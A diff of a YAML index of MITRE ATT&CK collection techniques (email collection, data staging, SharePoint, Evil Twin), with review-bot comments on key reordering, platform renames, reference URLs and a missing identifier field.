@@ -39083,7 +39557,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1056.001
atomic_tests: []
T1602:
@@ -39122,7 +39595,7 @@ collection:
Adversaries may collect data related to managed devices from configuration repositories. Configuration repositories are used by management systems in order to configure, manage, and control data on remote systems. Configuration repositories may also facilitate remote access and administration of devices.
Adversaries may target these repositories in order to collect large quantities of sensitive system administration data. Data from configuration repositories may be exposed by various protocols and software and can store a wide variety of data, much of which may align with adversary Discovery objectives.(Citation: US-CERT-TA18-106A)(Citation: US-CERT TA17-156A SNMP Abuse 2017)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T21:32:58.274Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Data from Configuration Repository
x_mitre_detection: 'Identify network traffic sent or received by untrusted hosts
@@ -39137,30 +39610,10 @@ collection:
- 'Network Traffic: Network Connection Creation'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1213.002:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--0c4b4fda-9062-47da-98b9-ceae2dcf052a
- type: attack-pattern
- created: '2020-02-14T13:35:32.938Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1213.002
- url: https://attack.mitre.org/techniques/T1213/002
- - url: https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2
- description: Microsoft. (2017, July 19). Configure audit settings for a site
- collection. Retrieved April 4, 2018.
- source_name: Microsoft SharePoint Logging
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Sharepoint
description: |
Adversaries may leverage the SharePoint repository as a source to mine valuable information. SharePoint will often contain useful information for an adversary to learn about the structure and functionality of the internal network and systems. For example, the following is a list of example information that may hold potential value to an adversary and may also be found on SharePoint:
@@ -39169,13 +39622,17 @@ collection:
* Physical / logical network diagrams
* System architecture diagrams
* Technical system documentation
- * Testing / development credentials
+ * Testing / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))
* Work / project schedules
* Source code snippets
* Links to network shares and other internal resources
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Arun Seelagan, CISA
+ x_mitre_deprecated: false
x_mitre_detection: "The user access logging within Microsoft's SharePoint can
be configured to report access to certain pages and documents. (Citation:
Microsoft SharePoint Logging). As information repositories generally have
@@ -39189,20 +39646,37 @@ collection:
of programmatic means being used to retrieve all data within the repository.
In environments with high-maturity, it may be possible to leverage User-Behavioral
Analytics (UBA) platforms to detect and alert on user based anomalies. \n\n"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ - 'Cloud Service: Cloud Service Metadata'
+ type: attack-pattern
+ id: attack-pattern--0c4b4fda-9062-47da-98b9-ceae2dcf052a
+ created: '2020-02-14T13:35:32.938Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1213/002
+ external_id: T1213.002
+ - source_name: Microsoft SharePoint Logging
+ description: Microsoft. (2017, July 19). Configure audit settings for a site
+ collection. Retrieved April 4, 2018.
+ url: https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
atomic_tests: []
T1123:
technique:
- modified: '2024-01-23T22:53:18.389Z'
+ modified: '2024-10-15T13:39:22.774Z'
name: Audio Capture
description: |-
An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information.(Citation: ESET Attor Oct 2019)
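Review bot: the substantive changes to T1213.002 in this hunk (platform `Office 365` renamed to `Office Suite`, new data source `Cloud Service: Cloud Service Metadata`, `x_mitre_version` '1.0' to '1.1', and the `x_mitre_permissions_required` list removed) are buried under a reordering of `type`, `id`, `created`, `created_by_ref`, `external_references` and `object_marking_refs` to the end of the mapping. If the generator's key order can be pinned, a stable order would keep future diffs to the actual field changes; as written, a reviewer has to pair the removed lines in the previous hunk with the added lines here to confirm that nothing was lost.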
@@ -39245,7 +39719,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1123
atomic_tests: []
T1560.003:
@@ -39270,7 +39743,7 @@ collection:
description: 'ESET. (2016, October). En Route with Sednit - Part 2: Observing
the Comings and Goings. Retrieved November 21, 2016.'
source_name: ESET Sednit Part 2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-25T22:48:14.605Z'
name: Archive via Custom Method
description: 'An adversary may compress or encrypt data that is collected prior
to exfiltration using a custom method. Adversaries may choose to use custom
@@ -39290,22 +39763,24 @@ collection:
x_mitre_data_sources:
- 'File: File Creation'
- 'Script: Script Execution'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1114:
technique:
- modified: '2023-09-29T21:06:03.098Z'
+ modified: '2024-10-15T12:24:27.627Z'
name: Email Collection
description: 'Adversaries may target user email to collect sensitive information.
Emails may contain sensitive data, including trade secrets or personal information,
- that can prove valuable to adversaries. Adversaries can collect or forward
- email from mail servers or clients. '
+ that can prove valuable to adversaries. Emails may also contain details of
+ ongoing incident response operations, which may allow adversaries to adjust
+ their techniques in order to maintain persistence or evade defenses.(Citation:
+ TrustedSec OOB Communications)(Citation: CISA AA20-352A 2021) Adversaries
+ can collect or forward email from mail servers or clients. '
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
x_mitre_contributors:
- Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
There are likely a variety of ways an adversary could collect email from a target, each with a different mechanism for detection.
@@ -39322,11 +39797,10 @@ collection:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Office 365
- - Google Workspace
- macOS
- Linux
- x_mitre_version: '2.5'
+ - Office Suite
+ x_mitre_version: '2.6'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
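Review bot: `Office 365` and `Google Workspace` are removed from T1114's `x_mitre_platforms` and replaced by the single value `Office Suite`. Anything that builds per-platform views from `x_mitre_platforms` by exact name will stop matching this technique under the old labels, so either map `Office Suite` back to those labels in that tooling or document the rename alongside this change.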
@@ -39342,37 +39816,28 @@ collection:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1114
external_id: T1114
+ - source_name: CISA AA20-352A 2021
+ description: CISA. (2021, April 15). Advanced Persistent Threat Compromise
+ of Government Agencies, Critical Infrastructure, and Private Sector Organizations.
+ Retrieved August 30, 2024.
+ url: https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-352a
- source_name: Microsoft Tim McMichael Exchange Mail Forwarding 2
description: McMichael, T.. (2015, June 8). Exchange and Office 365 Mail Forwarding.
Retrieved October 8, 2019.
url: https://blogs.technet.microsoft.com/timmcmic/2015/06/08/exchange-and-office-365-mail-forwarding-2/
+ - source_name: TrustedSec OOB Communications
+ description: 'Tyler Hudak. (2022, December 29). To OOB, or Not to OOB?: Why
+ Out-of-Band Communications are Essential for Incident Response. Retrieved
+ August 30, 2024.'
+ url: https://trustedsec.com/blog/to-oob-or-not-to-oob-why-out-of-band-communications-are-essential-for-incident-response
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1025:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - William Cain
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec
- type: attack-pattern
- created: '2017-05-31T21:30:31.584Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- url: https://attack.mitre.org/techniques/T1025
- external_id: T1025
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T16:30:50.936Z'
name: Data from Removable Media
description: "Adversaries may search connected removable media on computers
they have compromised to find files of interest. Sensitive data can be collected
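Review bot: the two `(Citation: ...)` keys added to the T1114 description in the previous hunk, `CISA AA20-352A 2021` and `TrustedSec OOB Communications`, both receive matching `source_name` entries in `external_references` here, so the new citations resolve. The removal of the leading T1025 keys at the bottom of this hunk is only the first half of a reordering that the following hunk completes; review the two together rather than reading this one as a deletion.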
@@ -39384,75 +39849,93 @@ collection:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_contributors:
+ - William Cain
+ x_mitre_deprecated: false
x_mitre_detection: Monitor processes and command-line arguments for actions
that could be taken to collect files from a system's connected removable media.
Remote access tools with built-in features may interact directly with the
Windows API to gather data. Data may also be acquired through Windows system
management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Command: Command Execution'
- 'File: File Access'
x_mitre_system_requirements:
- Privileges to access removable media drive and files
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec
+ created: '2017-05-31T21:30:31.584Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1025
+ external_id: T1025
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1025
atomic_tests: []
T1074.001:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Massimiliano Romano, BT Security
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c
- created: '2020-03-13T21:13:10.467Z'
- x_mitre_version: '1.1'
- external_references:
- - source_name: mitre-attack
- external_id: T1074.001
- url: https://attack.mitre.org/techniques/T1074/001
- - source_name: Prevailion DarkWatchman 2021
- url: https://www.prevailion.com/darkwatchman-new-fileless-techniques/
- description: 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A
- new evolution in fileless techniques. Retrieved January 10, 2022.'
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-08-26T16:28:39.920Z'
+ name: 'Data Staged: Local Data Staging'
description: |-
Adversaries may stage collected data in a central location or directory on the local system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.
Adversaries may also stage collected data in various available formats/locations of a system, including local storage databases/repositories or the Windows Registry.(Citation: Prevailion DarkWatchman 2021)
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: 'Data Staged: Local Data Staging'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ x_mitre_contributors:
+ - Massimiliano Romano, BT Security
+ x_mitre_deprecated: false
x_mitre_detection: |-
Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
Consider monitoring accesses and modifications to local storage repositories (such as the Windows Registry), especially from suspicious processes that could be related to malicious data collection.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Creation'
- 'Windows Registry: Windows Registry Key Modification'
- 'File: File Access'
- 'Command: Command Execution'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c
+ created: '2020-03-13T21:13:10.467Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1074/001
+ external_id: T1074.001
+ - source_name: Prevailion DarkWatchman 2021
+ description: 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A
+ new evolution in fileless techniques. Retrieved January 10, 2022.'
+ url: https://web.archive.org/web/20220629230035/https://www.prevailion.com/darkwatchman-new-fileless-techniques/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1074.001
atomic_tests: []
T1114.001:
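Review bot: the `Prevailion DarkWatchman 2021` reference URL for T1074.001 is replaced with a web.archive.org snapshot (`https://web.archive.org/web/20220629230035/https://www.prevailion.com/darkwatchman-new-fileless-techniques/`) while the `description` still cites the original December 14, 2021 publication. That is reasonable for a dead link, but the canonical URL now survives only embedded in the archive URL; if consumers dereference `url` directly, consider keeping the original in the description so provenance is not lost. The rest of the hunk is the T1025 and T1074.001 key reordering, with `x_mitre_attack_spec_version` moving from 2.1.0 to 3.2.0 and `revoked: false` added; apart from `modified`, no other field values change.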
@@ -39479,7 +39962,7 @@ collection:
url: https://support.office.com/en-us/article/introduction-to-outlook-data-files-pst-and-ost-222eaf92-a995-45d9-bde2-f331f60e2790
description: Microsoft. (n.d.). Introduction to Outlook Data Files (.pst and
.ost). Retrieved February 19, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T17:59:20.983Z'
name: 'Email Collection: Local Email Collection'
description: |-
Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user’s local system, such as Outlook storage or cache files.
@@ -39503,13 +39986,11 @@ collection:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1114.001
atomic_tests: []
T1119:
technique:
- modified: '2024-01-02T13:35:57.680Z'
+ modified: '2024-09-25T20:40:07.791Z'
name: Automated Collection
description: "Once established within a system or network, an adversary may
use automated techniques for collecting internal data. Methods for performing
@@ -39530,6 +40011,7 @@ collection:
phase_name: collection
x_mitre_contributors:
- Praetorian
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Depending on the method used, actions could include common
file system commands and parameters on the command-line interface within batch
@@ -39553,8 +40035,10 @@ collection:
- Windows
- IaaS
- SaaS
- x_mitre_version: '1.2'
+ - Office Suite
+ x_mitre_version: '1.3'
x_mitre_data_sources:
+ - 'User Account: User Account Authentication'
- 'Command: Command Execution'
- 'File: File Access'
- 'Script: Script Execution'
@@ -39579,7 +40063,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1119
atomic_tests: []
T1115:
@@ -39646,12 +40129,11 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1115
atomic_tests: []
T1530:
technique:
- modified: '2023-09-29T16:11:43.530Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Data from Cloud Storage Object
description: "Adversaries may access data from cloud storage.\n\nMany IaaS providers
offer solutions for online data object storage such as Amazon S3, Azure Storage,
@@ -39685,10 +40167,12 @@ collection:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Netskope
- Praetorian
- AppOmni
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Monitor for unusual queries to the cloud provider's storage
service. Activity originating from unexpected sources may indicate improper
@@ -39699,13 +40183,14 @@ collection:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- IaaS
- SaaS
- - Google Workspace
- - Office 365
- x_mitre_version: '2.1'
+ - Office Suite
+ x_mitre_version: '2.2'
x_mitre_data_sources:
+ - 'Cloud Service: Cloud Service Metadata'
- 'Cloud Storage: Cloud Storage Access'
type: attack-pattern
id: attack-pattern--3298ce88-1628-43b1-87d9-0b5336b193d7
@@ -39746,37 +40231,11 @@ collection:
url: https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/a-misconfigured-amazon-s3-exposed-almost-50-thousand-pii-in-australia
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1530
atomic_tests: []
T1074.002:
technique:
- x_mitre_platforms:
- - Windows
- - IaaS
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Praetorian
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--359b00ad-9425-420b-bba5-6de8d600cbc0
- type: attack-pattern
- created: '2020-03-13T21:14:58.206Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1074.002
- url: https://attack.mitre.org/techniques/T1074/002
- - source_name: Mandiant M-Trends 2020
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
- description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
- 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-30T13:28:37.414Z'
name: Remote Data Staging
description: |-
Adversaries may stage data collected from multiple systems in a central location or directory on one system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.
@@ -39787,23 +40246,47 @@ collection:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: |-
Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - IaaS
+ - Linux
+ - macOS
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'File: File Creation'
- 'Command: Command Execution'
- 'File: File Access'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--359b00ad-9425-420b-bba5-6de8d600cbc0
+ created: '2020-03-13T21:14:58.206Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1074/002
+ external_id: T1074.002
+ - source_name: Mandiant M-Trends 2020
+ description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+ 2020.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1005:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-12T23:54:39.466Z'
name: Data from Local System
description: |
Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
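Review bot: the `Mandiant M-Trends 2020` reference for T1074.002 now points at `https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf` instead of `https://content.fireeye.com/m-trends/rpt-m-trends-2020`, with the description unchanged. A host migration like this is fine but belongs in the commit message so consumers with cached reference lists understand why the URL changed. Separately, the T1005 `modified` value at the end of the hunk goes from '2023-05-09T14:00:00.188Z' back to '2023-04-12T23:54:39.466Z', which the source-bundle version should explain.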
@@ -39873,7 +40356,6 @@ collection:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1005
atomic_tests: []
T1560.002:
@@ -39908,7 +40390,7 @@ collection:
description: Wikipedia. (2016, March 31). List of file signatures. Retrieved
April 22, 2016.
source_name: Wikipedia File Header Signatures
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-29T18:27:30.891Z'
name: 'Archive Collected Data: Archive via Library'
description: |-
An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party libraries. Many libraries exist that can archive data, including [Python](https://attack.mitre.org/techniques/T1059/006) rarfile (Citation: PyPI RAR), libzip (Citation: libzip), and zlib (Citation: Zlib Github). Most libraries include functionality to encrypt and/or compress data.
@@ -39927,10 +40409,89 @@ collection:
x_mitre_data_sources:
- 'Script: Script Execution'
- 'File: File Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1560.002
atomic_tests: []
+ T1557.004:
+ technique:
+ modified: '2024-11-11T18:52:53.686Z'
+ name: Evil Twin
+ description: "Adversaries may host seemingly genuine Wi-Fi access points to
+ deceive users into connecting to malicious networks as a way of supporting
+ follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040),
+ [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002),
+ or [Input Capture](https://attack.mitre.org/techniques/T1056).(Citation: Australia
+ ‘Evil Twin’)\n\nBy using a Service Set Identifier (SSID) of a legitimate Wi-Fi
+ network, fraudulent Wi-Fi access points may trick devices or users into connecting
+ to malicious Wi-Fi networks.(Citation: Kaspersky evil twin)(Citation: medium
+ evil twin) Adversaries may provide a stronger signal strength or block access
+ to Wi-Fi access points to coerce or entice victim devices into connecting
+ to malicious networks.(Citation: specter ops evil twin) A Wi-Fi Pineapple
+ – a network security auditing and penetration testing tool – may be deployed
+ in Evil Twin attacks for ease of use and broader range. Custom certificates
+ may be used in an attempt to intercept HTTPS traffic. \n\nSimilarly, adversaries
+ may also listen for client devices sending probe requests for known or previously
+ connected networks (Preferred Network Lists or PNLs). When a malicious access
+ point receives a probe request, adversaries can respond with the same SSID
+ to imitate the trusted, known network.(Citation: specter ops evil twin) Victim
+ devices are led to believe the responding access point is from their PNL and
+ initiate a connection to the fraudulent network.\n\nUpon logging into the
+ malicious Wi-Fi access point, a user may be directed to a fake login page
+ or captive portal webpage to capture the victim’s credentials. Once a user
+ is logged into the fraudulent Wi-Fi network, the adversary may able to monitor
+ network activity, manipulate data, or steal additional credentials. Locations
+ with high concentrations of public Wi-Fi access, such as airports, coffee
+ shops, or libraries, may be targets for adversaries to set up illegitimate
+ Wi-Fi access points. "
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ x_mitre_contributors:
+ - Menachem Goldstein
+ - DeFord L. Smith
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Network
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Network Traffic: Network Traffic Content'
+ - 'Network Traffic: Network Traffic Flow'
+ type: attack-pattern
+ id: attack-pattern--48b836c6-e4ca-435a-82a3-29c03e5b492e
+ created: '2024-09-17T14:27:40.947Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1557/004
+ external_id: T1557.004
+ - source_name: Kaspersky evil twin
+ description: AO Kaspersky Lab. (n.d.). Evil twin attacks and how to prevent
+ them. Retrieved September 17, 2024.
+ url: https://usa.kaspersky.com/resource-center/preemptive-safety/evil-twin-attacks
+ - source_name: medium evil twin
+ description: Gihan, Kavishka. (2021, August 8). Wireless Security— Evil Twin
+ Attack. Retrieved September 17, 2024.
+ url: https://kavigihan.medium.com/wireless-security-evil-twin-attack-d3842f4aef59
+ - source_name: specter ops evil twin
+ description: Ryan, Gabriel. (2019, October 28). Modern Wireless Tradecraft
+ Pt I — Basic Rogue AP Theory — Evil Twin and Karma Attacks. Retrieved September
+ 17, 2024.
+ url: https://posts.specterops.io/modern-wireless-attacks-pt-i-basic-rogue-ap-theory-evil-twin-and-karma-attacks-35a8571550ee
+ - source_name: Australia ‘Evil Twin’
+ description: Toulas, Bill. (2024, July 1). Australian charged for ‘Evil Twin’
+ WiFi attack on plane. Retrieved September 17, 2024.
+ url: https://www.bleepingcomputer.com/news/security/australian-charged-for-evil-twin-wifi-attack-on-plane/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1602.002:
technique:
x_mitre_platforms:
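Review bot: the new T1557.004 entry has no `identifier: T1557.004` line between `x_mitre_modified_by_ref` and `atomic_tests: []`, whereas the T1560.002 entry immediately above ends with `identifier: T1560.002` before its `atomic_tests: []`. If `identifier` is emitted only under some condition (for example, when a matching atomics directory exists), that rule should be stated; otherwise the new entry should carry it for consistency. Two smaller points: `x_mitre_detection: ''` is an empty string rather than an omitted key, so renderers must tolerate an empty detection block, and the `description` is a double-quoted scalar with `\n\n` escapes folded across 27 lines, which is valid YAML but fragile if the generator's quoting style changes on the next run.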
@@ -39959,7 +40520,7 @@ collection:
url: https://www.us-cert.gov/ncas/alerts/TA18-086A
description: US-CERT. (2018, March 27). TA18-068A Brute Force Attacks Conducted
by Cyber Actors. Retrieved October 2, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-02-17T19:50:46.948Z'
name: Network Device Configuration Dump
description: "Adversaries may access network configuration files to collect
sensitive data about the device and the network. The network configuration
@@ -39989,8 +40550,6 @@ collection:
- 'Network Traffic: Network Traffic Content'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1560:
technique:
